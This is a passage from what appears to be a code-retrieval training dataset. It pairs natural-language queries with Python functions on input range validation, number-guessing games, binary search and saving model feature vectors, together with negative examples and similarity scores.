< predict:\n max_num = predict # set predicted number as upper limit \n return att_counter # number of attempts needed to \"guess\" the number", "def ask_with_input(string, range_param: int, str_choices: tuple,\n custom_validation: (callable, None) = None):\n while True:\n reply = input(string)\n try:\n if reply not in str_choices and not (\n custom_validation is not None and custom_validation(\n reply)):\n if range_param <= 0:\n continue\n elif int(reply) not in range(1, range_param + 1):\n continue\n except ValueError:\n continue\n break\n\n return reply", "def enterInteger(CustomMessage=\"Please enter an integer: \",\r\n CustomErrorMessage=\"The input is not an integer, please try again...\",\r\n min=None, max=None):\r\n \r\n isInteger = False\r\n while not isInteger:\r\n try:\r\n number = int(input(CustomMessage))\r\n isInteger = True\r\n except ValueError:\r\n print(CustomErrorMessage)\r\n\r\n # range parameter\r\n if type(min) is int and type(max) is int:\r\n if min > max:\r\n raise ValueError(\"parameter 'min' is larger than 'max'\")\r\n else:\r\n while min > number or number > max:\r\n number = enterInteger(CustomMessage=\"Please input a number within \"+str(min)+\" to \"+str(max)+\": \")\r\n elif type(min) is int:\r\n while min > number:\r\n number = enterInteger(CustomMessage=\"Please input a number larger than \" + str(min) + \": \")\r\n elif type(max) is int:\r\n while number > max:\r\n number = enterInteger(CustomMessage=\"Please input a number smaller than \" + str(max) + \": \")\r\n\r\n return number", "def constrain(inputVal, lower_limit, upper_limit):\n \n if (inputVal < lower_limit):\n return lower_limit\n elif (inputVal > upper_limit):\n return upper_limit\n else:\n return inputVal", "def _int_input_in_range(self, print_out, range_):\n try:\n i = int(input(print_out))\n assert range_[0] <= i <= range_[1]\n return i\n except AssertionError:\n print('Please, enter a vaild number')\n return None\n except ValueError:\n print('Please, enter a number not a string')\n return None", "def translate_num(number, lower_bound, upper_bound):\n try:\n value = int(number, 0)\n if value < lower_bound or value > upper_bound:\n raise translate_num_out_of_range(value, lower_bound, upper_bound)\n else:\n return value\n except:\n raise translate_num_error(number)", "def get_puzzle_no():\r\n \r\n puzzle_no = int(input(\"Enter the number of the puzzle to print the trace of (1-25): \"))\r\n while puzzle_no < 1 or puzzle_no > 25:\r\n print(\"Choice is invalid! Try again\")\r\n puzzle_no = int(input(\"Enter the number of the puzzle to print solution of (1-25): \"))\r\n \r\n return puzzle_no", "def binary_search(low, high, actual_number):\n tries = 0\n guess = 0\n\n n = list(range(low, high + 1))\n min = 0\n max = len(n)\n\n #Find the midpoint\n while max >= min:\n #finds the average of the min and the difference between max and min.\n MidPoint = math.floor(min + (max - min)/2)\n #check midpoint is the answer\n if n[MidPoint] is actual_number:\n return {\"guess\": guess, \"tries\": tries}\n #Higher or lower than midpoint\n elif n[MidPoint] > actual_number:\n #add try\n tries +=1\n guess = n[MidPoint]\n #new maximum\n max = MidPoint - 1\n \n else:\n #add try\n tries += 1\n guess = n[MidPoint]\n #new minimum is the midpoint + 1\n min = MidPoint + 1\n return {\"guess\": guess, \"tries\": tries}", "def get_int(self):\n while True:\n try:\n choice = int(input(\"Choose: \"))\n if 1 <= choice <= len(self.menu):\n return choice\n print(\"Invalid choice.\")\n except (NameError,ValueError, TypeError,SyntaxError):\n print(\"That was not a number, genious.... :(\")", "def ask_input(player, row_or_column):\n\n row_or_column_number = ask_input_helper(player, row_or_column)\n while row_or_column_number not in range(board_size):\n print \"Please choose a number within the range.\" \n row_or_column_number = ask_input_helper(player, row_or_column)\n return row_or_column_number", "def show_menu():\n while True:\n try:\n display_menu()\n ans = int(input(\"Enter your selection [1-4]: \"))\n if ans in range(1, 7):\n return ans\n raise ValueError()\n except Exception as Ex:\n print_error()\n continue", "def get_positive_int(prompt):\n while True:\n n = get_int(prompt)\n if 0 <= n and n < 24:\n break\n return n", "def getHenhouseDisplayMenuChoice ():\r\n while True :\r\n try :\r\n choice = int(input('Select an option: '))\r\n if 0 <= choice <= 2 :\r\n break \r\n else :\r\n print('Please enter a valid option')\r\n except ValueError :\r\n print('Please enter a valid option')\r\n return(choice)", "def compare_numbers():\n compareOld = None\n\n while True:\n compareInput = input(\"Please provide a number. Quit with 'done'\")\n if compareInput == 'done':\n break\n \n try:\n compareNumber = int(compareInput)\n\n if compareOld is None:\n print(\"This is your first number\")\n elif compareNumber == compareOld:\n print(\"Your number is the same as before!\")\n elif compareNumber < compareOld:\n print(\"Your number is less than before!\")\n elif compareNumber > compareOld:\n print(\"Your number is bigger than before!\")\n compareOld = compareNumber\n except ValueError:\n print(\"You need to provide a number\")", "def validate_num(number):\n\n if number <= 0:\n new_num = int(raw_input(\"Oops, your number has to be greater than 0. Please pick again: \"))\n return validate_num(new_num)\n\n else:\n return number", "def range_function(num, start_range, end_range):\n if num > start_range and num < end_range:\n print(num, \"is in the range.\\n\")\n elif num < start_range or num > end_range:\n print(num, \"is not in the range.\\n\")", "def query_number(question, default=1):\n if default is None:\n prompt = \" [] \"\n else:\n prompt = \" [%d] \" % default\n\n while True:\n sys.stdout.write(question + prompt)\n choice = input().lower()\n if default is not None and choice == '':\n return int(default)\n elif choice.isdigit():\n return int(choice)\n else:\n sys.stdout.write(\"Please respond with a number\\n\")", "def input_int(question):\n while True:\n try:\n value = int(input(question))\n except (SyntaxError, NameError) as exception:\n print(\"Invalid entry. Try again.\")\n continue\n\n if value <= 0:\n print(\"Invalid entry. Try again.\")\n continue\n else:\n break\n\n return value", "def fn(lo, hi):\n if lo >= hi: return 0 # no need to guess \n ans = inf\n for mid in range(lo, hi+1): \n ans = min(ans, mid + max(fn(lo, mid-1), fn(mid+1, hi)))\n return ans", "def clamp(num,start,end):\n if num >= start and num <= end: return num\n elif num < start: return start\n elif num > end: return end", "def random_int_below(upper_bound):\r\n \r\n try:\r\n upper_bound = int(upper_bound)\r\n except ValueError:\r\n raise TypeError('number should be an integer')\r\n \r\n if upper_bound <= 0:\r\n raise ValueError('number must be greater than zero')\r\n \r\n \r\n # If upper_bound == 1, the math_log call will loop infinitely.\r\n # The only int in [0, 1) is 0 anyway, so return 0 here.\r\n # Resolves bug #927\r\n if upper_bound == 1:\r\n return 0\r\n \r\n k = int(1.00001 + math_log(upper_bound - 1, 2.0)) # 2**k > n-1 > 2**(k-2)\r\n r = random_nbit_int(k)\r\n while r >= upper_bound:\r\n r = random_nbit_int(k)\r\n return r", "def in_range(low, high, step=None):\n def check(value):\n if not low <= value < high:\n return False\n\n if step is not None:\n return (value - low) % step == 0\n return True\n\n return check", "def guess_the_number():\n # get a random number from 1 to 1000\n number = random.randrange(1, 1000)\n\n guess = 0\n gcounter = 0\n # compare guess and selected number\n while guess != number:\n # get user input\n guess = int(input('Guess my number between 1 to 1000: '))\n # compare with number\n if guess > number:\n print('Too high. Try again')\n gcounter += 1\n elif guess < number:\n print('Too low. Try again')\n gcounter += 1\n else:\n # if equal, congratulate the user\n print('Congratulations, you guessed the number!')\n print(f'You used {gcounter} guesses')\n # check the number of guesses and provide feedback\n if gcounter > 10:\n print('You should be able to do better')\n else:\n print('Either you know the secret or you got lucky.')\n # give the option to restart the game or quit.\n response = input((\"Would you like to play it again? \"\n \"('yes' or 'no'): \"))\n # check user response\n if response == 'yes':\n number = random.randrange(1, 100)\n guess = 0\n gcounter = 0\n elif response == 'no':\n print('Bye.')\n break\n else:\n print('Invalid response. Quitting...')\n break", "def ge(value, limit):\n return value >= limit", "def bisect_right(func, val, low, high):\n a = low\n b = high\n while b > a:\n guess = (a+b)//2\n\n if val >= func(guess):\n a = guess+1\n else:\n b = guess\n\n return a", "def check_crash(int_choice, map_number):\n # Check if input is only an int and if it is in the range of total map\n if isinstance(int_choice, int) and \\\n (int_choice in range(map_number + 1)):\n return True\n\n else:\n print(\"Input not a number or out of range !!!\")\n print(\"Wait 2seconds\")\n time.sleep(2)\n\n # Go back to previous state\n if GAME == \"NEW\":\n new_game()\n else:\n saved_game()", "def bisect_left(func, val, low, high):\n\n a = low\n b = high\n while b > a:\n guess = (a+b)//2\n\n if val > func(guess):\n a = guess+1\n else:\n b = guess\n\n return a", "def check_guess(guess):\n while True:\n print(\" Was \" + str(guess) + \" too high, too low, or correct?\")\n answer = input()\n answer= answer.lower()\n \n if answer == 'too low' or answer == 'to low':\n return -1\n elif answer == 'too high' or answer == 'to high':\n return 1\n elif answer == 'correct':\n return 0\n else:\n print(\"I don't understand. Please enter 'too low', too high', or 'correct'.\")", "def advancedGuessingGame():\n\n print(\"\\nWelcome to the guessing game!\")\n print(\"A number between _ and _ ?\")\n\n lowerBound = not_number_rejector(\"Enter Lower Bound: \")\n\n higher_number = False # we need to set an upper and lowerbound for game\n\n while not higher_number:\n upperBound = not_number_rejector(\"Enter Upper Bound: \")\n if upperBound > lowerBound:\n higher_number = True\n else:\n print(\"The upperbound is lower than you lowerbound: TRY AGAIN\")\n\n # above code ensures upper > lower, see stubbon_asker in EX1\n\n print(\"OK then, guess a number between {} and {} ?\".format(lowerBound, upperBound))\n lowerBound = int(lowerBound) # ensures integer is give (Not a letter)\n upperBound = int(lowerBound)\n\n actualNumber = random.randint(lowerBound, upperBound)\n\n guessed = False\n\n while not guessed:\n guessedNumber = not_number_rejector(\"Make a guess: \")\n print(\"You guessed {},\".format(guessedNumber),)\n if guessedNumber == actualNumber:\n print(\"HOW DID YOU GET THAT! It was {}\".format(actualNumber))\n guessed = True\n elif guessedNumber > upperBound:\n print(\"This is higher than the upperbound! Try again!\")\n elif guessedNumber < lowerBound:\n print(\"This is lower than the lowerbound! Try again!\")\n elif guessedNumber < actualNumber:\n print(\"{} is too small, try again\".format(actualNumber))\n else:\n print(\"{} is too big, try again \".format(actualNumber))\n return \"You got it!\"\n # the tests are looking for the exact string \"You got it!\". Don't modify that!", "def le(value, limit):\n return value <= limit", "def high_and_low(numbers):\n highest = max(numbers)\n lowest = min(numbers)\n return (highest,lowest)", "def get_int(nodesdict):\n\tlimit = len(nodesdict); \n\twhile True:\n\t\tnode_choice = input().strip().split(\" \")\n\t\tvalid = True\n\t\tfor node in node_choice: \n\t\t\ttry:\n\t\t\t\tnode_int = int(node)\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"Please enter a series of number(s)!\", end= \" \")\n\t\t\t\tvalid = False; break\n\t\t\tif not 1 <= node_int <= limit:\n\t\t\t\tprint(f\"Please enter number(s) between 01 and {limit}:\", end=\" \")\n\t\t\t\tvalid = False; break\n\t\t\telif nodesdict[\"node{:02d}\".format(node_int)][\"remain\"] == \"--\":\n\t\t\t\tprint(\"'node{:02d}' is unavailable, please choose others:\".format(node_int), end=\" \")\n\t\t\t\tvalid = False; break\n\t\t\telif nodesdict[\"node{:02d}\".format(node_int)][\"remain\"] == 0:\n\t\t\t\tprint(\"'node{:02d}' is full, please choose others:\".format(node_int), end=\" \")\n\t\t\t\tvalid = False; break\n\t\tif valid: node_choice = [int(node) for node in node_choice]; return node_choice" ]
[ "0.8282392", "0.8165286", "0.8158761", "0.8158761", "0.8125007", "0.7887655", "0.74961793", "0.7476491", "0.7303107", "0.70028126", "0.69437313", "0.69389933", "0.69310325", "0.689875", "0.68148214", "0.67976105", "0.67912346", "0.6782751", "0.66932416", "0.6617285", "0.6519485", "0.65174717", "0.6454796", "0.6435012", "0.63620216", "0.6349941", "0.63387495", "0.629023", "0.62826866", "0.624005", "0.6228854", "0.621956", "0.6155883", "0.6147889", "0.6115897", "0.6100811", "0.6090449", "0.6084571", "0.6078378", "0.60727525", "0.6063732", "0.60561067", "0.60488915", "0.6046309", "0.6041088", "0.6017149", "0.59946084", "0.5994361", "0.59895945", "0.59879166", "0.5958363", "0.59535843", "0.5921712", "0.591126", "0.5904754", "0.59034115", "0.5901433", "0.5887408", "0.5885701", "0.58826977", "0.5838528", "0.58354527", "0.5805638", "0.57799745", "0.57594174", "0.5730284", "0.5728069", "0.5724878", "0.57031083", "0.56823266", "0.5676787", "0.5675158", "0.56719625", "0.56461036", "0.5643064", "0.5641472", "0.56367415", "0.5605116", "0.56036764", "0.55757445", "0.5568069", "0.55427366", "0.55402035", "0.5535841", "0.55175406", "0.5510341", "0.550868", "0.55013925", "0.5494664", "0.5477826", "0.5462469", "0.5455416", "0.5452521", "0.54284465", "0.54241735", "0.54171973", "0.5408572", "0.5408283", "0.5403756", "0.54036355" ]
0.67488945
18
Extracts feature vectors from a given model and dataset and writes them, along with labels, to a file. This function works for any model whose forward() method returns, on any given input x, the pair (prediction on x, feature vector for x) and more generally, any model whose second return value is a feature vector.
def extract_feature_vectors(model, data_loader, parameters, features_file_path): feature_vectors, label_vectors = [], [] # Set model to evaluation mode model.eval() # Show progress bar while iterating over mini-batches with tqdm(total=len(data_loader)) as progress_bar: for i, (X_batch, Y_batch) in enumerate(data_loader): # Dimensions of the input Tensor batch_size, channels, height, width = X_batch.size() # If GPU available, enable CUDA on data if parameters.cuda: X_batch = X_batch.cuda() Y_batch = Y_batch.cuda() # Wrap the input tensor in a Torch Variable X_batch_variable = Variable(X_batch, volatile=True) # Run the model on this batch of inputs, obtaining a Variable of predicted labels and a Variable of features Y_predicted, features = model(X_batch_variable) # Convert the features Variable (of size [batch_size, 1024]) to a Tensor, move it to # CPU, and convert it to a NumPy array features_numpy = features.data.cpu().numpy() # Move the labels Tensor (of size [batch_size, 14]) to CPU and convert it to a NumPy array Y_numpy = Y_batch.cpu().numpy() # For each example in the batch, record its features and labels for j in range(batch_size): feature_vectors.append(features_numpy[j,:]) label_vectors.append(Y_numpy[j,:]) progress_bar.update() utils.write_feature_and_label_vectors(features_file_path, feature_vectors, label_vectors)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def save_vectors (feat_vec = None, labels = None, file_extension = None):\n\n feat_file_name = 'output/' + file_extension + '.feature'\n label_file_name = 'output/' + file_extension + '.label'\n\n prettyPrint('Saving feature vector file: {0} ... \\n'\n 'Saving Labels file: {1} ... '.format(feat_file_name, label_file_name), color.CYAN)\n\n #Save feature vector to disk\n with open(feat_file_name, 'w') as f:\n pickle.dump(feat_vec, f)\n #Save label file\n with open(label_file_name, 'w') as f:\n pickle.dump(labels, f)", "def writeFeatures(features, labels, output_filename):\n\twith open(output_filename, 'w') as csvfile:\n\t fieldnames = features[0].keys()\n\t fieldnames.append('label')\n\t writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n\t writer.writeheader()\n\t for i in range(len(features)):\n\t \tfeatures[i]['label'] = labels[i]\n\t \twriter.writerow(features[i])\n\n\treturn", "def write_svm_features(clf, vectorizer, round=1, filename=\"features\"):\n\n f = open(\"%s-round%d.txt\" % (filename, round), \"w\")\n weight_feature_pairs = zip(clf.coef_.tolist()[0], vectorizer.feature_names_)\n weight_feature_pairs.sort(key=lambda x:abs(x[0]), reverse=True)\n for weight, word in weight_feature_pairs:\n f.write(\"%s\\t%g\\n\" % (word, weight))\n f.close()", "def write_model_results(model, input_file, repr, tags, outpath):\n input, input_data = read_input(input_file)\n\n if repr == \"c\":\n x = utils.get_features(input, ixs=3)\n else:\n x = utils.get_features(input, chars=True)\n\n w_batcher = utils.AutoBatcher(x, x, batch_size=1, shuffle=False)\n labels = []\n for inputs, _ in w_batcher.get_batches():\n output = torch.max(model(inputs), 1)[1]\n labels += output.cpu().data.numpy().tolist()\n\n predictions = utils.NEWLINE.join([\"{} {}\".format(input_data[i], tags[labels[i]])\\\n for i in range(len(input_data))])\n with open(outpath, \"w\") as outfile:\n outfile.write(predictions)", "def write_model(clf, filename):\n joblib.dump(clf, filename)", "def write_feature_labels(output, feature_labels):\n with open(os.path.join(output, 'features.list'), 'w') as out_file:\n out_file.write('\\n'.join(feature_labels))", "def write_predictions_to_file(predictor, testDataFname, enc, outputFname, features=None):\n\n testData, _, testDataIds, _ = make_data(testDataFname, features=features, enc=enc)\n\n dt = datetime.now()\n predictions = predictor.predict(testData)\n print 'predicting took', datetime.now() - dt\n\n featureSelectionOutput = np.transpose(np.vstack((testDataIds, predictions.round().astype(int))))\n\n with open(outputFname, 'wb') as outputFile:\n writer = csv.writer(outputFile)\n writer.writerow(['id', 'loss'])\n writer.writerows(featureSelectionOutput)", "def save_model(self):\n\n self.check_model()\n\n with open(self.filename, 'wb') as file:\n pickle.dump({'model': self.model, 'vec': self.vectorizer, 'vec_data': self.vectorized_data,\n 'df': self.df_topic_keywords}, file)", "def save_features(model, config_dict, steps, dataset):\n if config_dict['inference_only']:\n model.load_weights(config_dict['checkpoint']).expect_partial()\n\n # @tf.function\n def get_features_step(x):\n predictions, features = model(x, training=False)\n # Downsample further with one MP layer, strides and kernel 2x2\n # The result per frame is 4x4x32.\n # features = tf.keras.layers.TimeDistributed(\n # tf.keras.layers.MaxPool2D())(features)\n # # The result per frame is 1x32.\n # features = tf.keras.layers.TimeDistributed(\n # tf.keras.layers.GlobalAveragePooling2D())(features)\n features = tf.keras.layers.Flatten()(features)\n return predictions, features\n\n features_to_save = []\n\n with tqdm(total=steps) as pbar:\n for step, sample in enumerate(dataset):\n if step > steps:\n break\n pbar.update(1)\n to_save_dict = {}\n x_batch_train, y_batch_train, paths = sample\n preds, flow_rgb_map_merge = get_features_step(x_batch_train)\n to_save_dict['paths'] = paths\n to_save_dict['preds'] = preds\n to_save_dict['features'] = flow_rgb_map_merge\n to_save_dict['y'] = y_batch_train\n features_to_save.append(to_save_dict)\n features_to_save = np.asarray(features_to_save)\n np.savez_compressed(config_dict['checkpoint'][:18] + '_saved_features_20480dims', features_to_save)", "def transform_word_vectors(self):\n print('Transforming word vectors')\n \n self.train_X_tfidfvec = self.get_word_vectors(self.train_X)\n self.val_X_tfidfvec = self.get_word_vectors(self.val_X)\n self.test_X_tfidfvec = self.get_word_vectors(self.test_X)\n if self.savename is not None:\n with open(self.savename + '_X_tfidfvec.obj','wb') as f:\n pickle.dump((self.train_X_tfidfvec,self.val_X_tfidfvec,self.test_X_tfidfvec),f) \n print('Done transforming word vectors')", "def save_features_to_file(path: str, features: Data_dict_type, labels: Labels_dict_type_numpy):\n for key, item in features.items():\n filename = key\n values, sample_rate = item\n window_labels = labels[filename].reshape((-1, 1))\n concatenated_data = np.concatenate(\n [np.array([i for i in range(values.shape[0])])[..., np.newaxis], # window_idx\n values, # features\n window_labels], axis=-1) # labels\n df_to_save = pd.DataFrame(data=concatenated_data)\n columns = ['window_idx'] + ['feature_%i' % i for i in range(values.shape[-1])] + ['label']\n df_to_save.columns = columns\n df_to_save.to_csv(os.path.join(path, filename.split('.')[0] + '.csv'), index=False)", "def save_predictions(model, dataset, output_dir):\n preds = model.predict(dataset, verbose=1)\n preds = scipy.special.softmax(preds, 1) # Apply softmax\n with tf.io.gfile.GFile(os.path.join(output_dir, 'test_preds.pkl'), 'wb') as f:\n pickle.dump(preds, f)", "def write_model_data(model, filename):\n data = lasagne.layers.get_all_param_values(model)\n filename = os.path.join('./', filename)\n filename = '%s.%s' % (filename, PARAM_EXTENSION)\n with open(filename, 'w') as f:\n pickle.dump(data, f)", "def generate_and_save_train_features(train_input, train_output, bag_of_words, tfidf):\n df_train = get_df(train_input)\n train_words = np.array(df_train.text.str.lower().values)\n\n bag_of_words.fit(train_words)\n\n train_words_binary_matrix = bag_of_words.transform(train_words)\n feature_names = bag_of_words.get_feature_names_out()\n\n tfidf.fit(train_words_binary_matrix)\n train_words_tfidf_matrix = tfidf.transform(train_words_binary_matrix)\n\n save_matrix(df_train, train_words_tfidf_matrix, feature_names, train_output)", "def save_all_features(nb_samples, source=\"./datasets/D1/images/\", dest=\"./datasets/D1/features/\", input_size=(416, 416), batch_size=16):\n\n # check if the directory exists, and if not make it\n if not os.path.exists(dest):\n os.makedirs(dest)\n\n # define image height and width\n (img_height, img_width) = input_size\n\n # build the VGG16 network and extract features after every MaxPool layer\n model = VGG16(weights='imagenet', include_top=False)\n\n c1 = model.layers[-16].output\n c1 = GlobalAveragePooling2D()(c1)\n\n c2 = model.layers[-13].output\n c2 = GlobalAveragePooling2D()(c2)\n\n c3 = model.layers[-9].output\n c3 = GlobalAveragePooling2D()(c3)\n\n c4 = model.layers[-5].output\n c4 = GlobalAveragePooling2D()(c4)\n\n c5 = model.layers[-1].output\n c5 = GlobalAveragePooling2D()(c5)\n\n\n model = Model(inputs=model.input, outputs=(c1, c2, c3, c4, c5))\n\n # always save your weights after training or during training\n model.save_weights('first_try.h5')\n model.save('model_save')\n\n # define image generator without augmentation\n datagen = ImageDataGenerator(rescale=1. / 255.)\n\n generator = datagen.flow_from_directory(\n source,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode=\"sparse\",\n shuffle=False)\n\n # generate and save features, labels and respective filenames\n steps = nb_samples / batch_size + 1\n X = model.predict_generator(generator, steps)\n Y = np.concatenate([generator.next()[1] for i in range(0, generator.samples, batch_size)])\n names = generator.filenames\n\n for n, i in enumerate(X):\n print(\"Saving \" + n + \" and \" + i)\n with open(dest + \"X-\" + str(img_height) + \"-c\" + str(n + 1) + \"-AVG.npy\", 'w') as f:\n np.save(f.name, i)\n\n if not os.path.exists(dest + \"Y.npy\"):\n with open(dest + \"Y.npy\", 'w') as f:\n np.save(f.name, Y)\n\n if not os.path.exists(dest + \"filenames.npy\"):\n with open(dest + \"filenames.npy\", 'w') as f:\n np.save(f.name, names)", "def dump_vecs():\n v_file = os.path.join(TMP_DIR, 'vectorizer.pickle')\n d_file = os.path.join(TMP_DIR, 'dectorizer.pickle')\n f_file = os.path.join(TMP_DIR, 'freq.pickle')\n \n with open(v_file, 'wb') as f:\n pickle.dump(VECTORIZER, f)\n with open(d_file, 'wb') as f:\n pickle.dump(CECTORIZER, f)", "def cross_validation(feature_train, help_rank_train, model_name):\n clf = svm.SVC(kernel='linear', C=1).fit(feature_train, help_rank_train)\n clf_model = open(model_name,'wb')\n dump(clf, clf_model, -1)\n return", "def output():\n\n if args.top and not args.tfidf and not args.svd:\n most_frequent(vector).to_csv(path_or_buf=\"top{}_vectorfile.csv\".format(args.top))\n\n elif args.top and args.tfidf and not args.svd:\n tfidf_transform(most_frequent(vector)).to_csv(path_or_buf=\"tfidf_top{}.csv\".format(args.top))\n\n elif args.top and args.tfidf and args.svd:\n svd_transform(tfidf_transform(most_frequent(vector)), indexes).to_csv(path_or_buf=\"svd{}_tfidf_topn.csv\".format(args.svd))\n\n elif args.tfidf and not args.top and not args.svd:\n tfidf_transform(vector).to_csv(path_or_buf=\"tfidf.csv\")\n\n elif args.svd and not args.top and not args.tfidf:\n svd_transform(vector, indexes).to_csv(path_or_buf=\"svd{}_vector.csv\".format(args.svd))\n\n elif args.tfidf and args.svd and not args.top:\n svd_transform(tfidf_transform(vector), indexes).to_csv(path_or_buf=\"svd{}_tfidf.csv\".format(args.svd))\n\n else:\n vector.to_csv(path_or_buf=\"vectorfile.csv\")", "def savemodel(self, fname):\n if not fname.endswith('.gz'):\n fname += '.gz'\n D = {'clf':self.clf, 'vocab':self.vocab,\n 'idxlabelmap':self.labelmap}\n with gzip.open(fname, 'w') as fout:\n dump(D, fout)\n print 'Save model into file: {}'.format(fname)", "def write_vecs(self, vecs_fname):\r\n header = f'{self.vectors.shape[0]} {self.vectors.shape[1]}'\r\n np.savetxt(vecs_fname, np.hstack([self.words.reshape(-1, 1), self.vectors]), fmt='%s', header=header)", "def walk_forward_cv(self):\r\n for output_name in self.output_names:\r\n print('\\t\\t\\t|--Prediction type: {}'.format(output_name))\r\n optimal_params_by_model = {}\r\n cv_metadata_by_model = {}\r\n cv_predictions_by_model = {}\r\n \r\n print('\\t\\t\\t\\t|--SVM Model')\r\n svm = SupportVectorMachine()\r\n svm.cv_params = self.cv_params\r\n svm.test_name = self.test_name\r\n svm.full_df = self.full_df\r\n svm.feature_names = self.feature_names\r\n svm.output_name = output_name\r\n svm.run_svm_cv()\r\n optimal_params_by_model['SVM'] = svm.svm_optimal_params\r\n cv_metadata_by_model['SVM'] = svm.metadata\r\n cv_predictions_by_model['SVM'] = svm.svm_cv_predictions\r\n \r\n self.optimal_params_by_output[output_name] = optimal_params_by_model\r\n self.cv_metadata_by_output[output_name] = cv_metadata_by_model\r\n self.cv_predictions_by_output[output_name] = cv_predictions_by_model", "def creating_feature_vector():\r\n\twordlist = []\r\n\tlabel = \"\"\r\n\tfw = open(\"feature_vector.txt\", \"w+\", encoding = \"utf-8\")\r\n\twith open(\"D:\\\\Python_Prac\\\\wordstag\\\\modules\\\\HI_EN_TRAIN.txt\", \"r\", encoding = \"utf-8\") as f:\r\n\t\tfor line in f:\r\n\t\t\twordlist.append(line)\r\n\t\tfor index, line in enumerate(wordlist):\r\n\t\t\tif line == \"\\n\":\r\n\t\t\t\tcontinue\r\n\t\t\tcontext = line.split(\"\\t\")\r\n\t\t\tlabel = context[1]\r\n\t\t\tfeature_vector = label+\" \"\r\n\t\t\tngram_vector = ngram_frequency(str(context[0]))\r\n\t\t\tfor vector in ngram_vector:\r\n\t\t\t\tfeature_vector += str(vector)+\" \"\r\n\t\t\tfeature_vector += str(is_english(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(is_hindi(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(is_abbr(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(med_in_english(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(med_in_hindi(context[0]))+\" \"\r\n\t\t\tbefore = [0,0,0]\r\n\t\t\tafter = [0,0,0]\r\n\t\t\tfor i in range(3):\r\n\t\t\t\tif (index-i) < 0 or (index-i+1) > len(wordlist)-1:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tbefore[2-i] = get_word_context(wordlist[index-i+1].split(\"\\t\")[0])\r\n\t\t\tfor i in range(3):\r\n\t\t\t\tif (index+i+1) > len(wordlist)-1:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tafter[2-i] = get_word_context(wordlist[index+i+1].split(\"\\t\")[0])\r\n\t\t\tfor i in before:\r\n\t\t\t\tfeature_vector += str(i)+\" \"\r\n\t\t\tfor i in after:\r\n\t\t\t\tfeature_vector += str(i)+\" \"\r\n\t\t\tfeature_vector += \"\\n\"\r\n\t\t\tfw.write(feature_vector)\r\n\t\t\tprint(\"Proceeding...\"+str(index+1)+\" of 16683\")\r\n\r\n\tfw.close()", "def generate_and_save_test_features(test_input, test_output, bag_of_words, tfidf):\n df_test = get_df(test_input)\n test_words = np.array(df_test.text.str.lower().values)\n\n test_words_binary_matrix = bag_of_words.transform(test_words)\n test_words_tfidf_matrix = tfidf.transform(test_words_binary_matrix)\n feature_names = bag_of_words.get_feature_names_out()\n\n save_matrix(df_test, test_words_tfidf_matrix, feature_names, test_output)", "def save_models(\n output_path,\n asv_model,\n asv_preprocessing_parameters,\n cm_feature_network,\n cm_model,\n bonafide_cm_features\n):\n asv_state_dict = asv_model.state_dict()\n # Add preprocessing data for Xvectors (if any)\n asv_state_dict.update(asv_preprocessing_parameters)\n torch.save(asv_state_dict, output_path + \"_asv_model\")\n\n # Use existing function to save CM model\n save_cm_model(\n cm_feature_network,\n cm_model,\n bonafide_cm_features,\n output_path + \"_cm_model\"\n )", "def get_model_output_and_feature(\n model,\n batch_x\n):\n outputs, features = model.get_output_and_feature(batch_x, training=False)\n return outputs, features", "def dump_slice_dataset(X: csr_matrix,\n y: csr_matrix,\n feat_file: Union[str, TextIOWrapper],\n label_file: Union[str, TextIOWrapper]) -> None:\n if isinstance(feat_file, str):\n feat_file = open(feat_file, 'w')\n elif isinstance(feat_file, TextIOWrapper):\n pass\n else:\n raise TypeError(f'feature_file is type {type(feat_file)} but should be either str or TextIOWrapper')\n\n if isinstance(label_file, str):\n label_file = open(label_file, 'w')\n elif isinstance(label_file, TextIOWrapper):\n pass\n else:\n raise TypeError(f'label_file is type {type(label_file)} but should be either str or TextIOWrapper')\n\n if X.shape[0] != y.shape[0]:\n raise Exception('X and y must have same shape')\n\n # 1. create sparse label file\n # format:\n # The first line of both the files contains the number of rows\n # the label file contains indices of active labels\n # and the corresponding value (always 1 in this case) starting from 0\n\n # write header\n label_header = f'{y.shape[0]} {y.shape[1]}\\n'\n label_file.write(label_header)\n # write data\n for label_vector in y:\n label_idx = label_vector.nonzero()[1]\n line = f'{\" \".join([f\"{label_id}:1\" for label_id in map(str, label_idx)])}\\n'\n label_file.write(line)\n\n label_file.close()\n\n # 2. create dense feature file\n # format:\n # The first line of both the files contains the number of rows\n # For features, each line contains D (the dimensionality of the feature vectors), space separated, float values\n\n # write header\n feature_header = f'{X.shape[0]} {X.shape[1]}\\n'\n feat_file.write(feature_header)\n # write data\n for feature_vector in X:\n line = f'{\" \".join(map(str, [i if i > 0.0 else int(0) for i in feature_vector[0].toarray().ravel()]))}\\n'\n feat_file.write(line)\n\n feat_file.close()\n\n return", "def save_to_arff(file_path, interactions, labels, selection,\n vectorizer=None, unlabelled=False, meka=True, use_bzip=True):\n if use_bzip:\n zipper = bz2\n else:\n zipper = gzip\n\n if vectorizer is None:\n vectorizer = CountVectorizer(lowercase=False, binary=True)\n\n X, y = interactions_to_Xy_format(interactions, selection)\n mlb = MultiLabelBinarizer(classes=sorted(labels), sparse_output=False)\n if not unlabelled:\n y = mlb.fit_transform(y)\n X = vectorizer.fit_transform(X)\n\n if meka:\n header = \"@relation 'PTMs: -C %d'\\n\\n\" % (len(labels))\n else:\n header = \"@relation PTMs\\n\\n\"\n\n for label in labels:\n header += \"@attribute %s {0,1}\\n\" % (label)\n for feature in (rename(x) for x in vectorizer.get_feature_names()):\n header += \"@attribute %s numeric\\n\" % (feature)\n\n header += \"\\n@data\\n\\n\"\n\n with zipper.open(file_path, 'wb') as fp:\n X = X.todense()\n if unlabelled:\n X = X.astype(str)\n y = y.astype(str)\n y[:, :] = '?'\n vec = np.hstack([y, X])\n np.savetxt(\n fp, X=vec, fmt='%s', delimiter=',', comments='', header=header\n )", "def gather_and_save_vectors(path, words_vec = collections.defaultdict(list), features = []):\n with open(path, 'rt', encoding='mac_roman') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='\"')\n for row in csvreader:\n 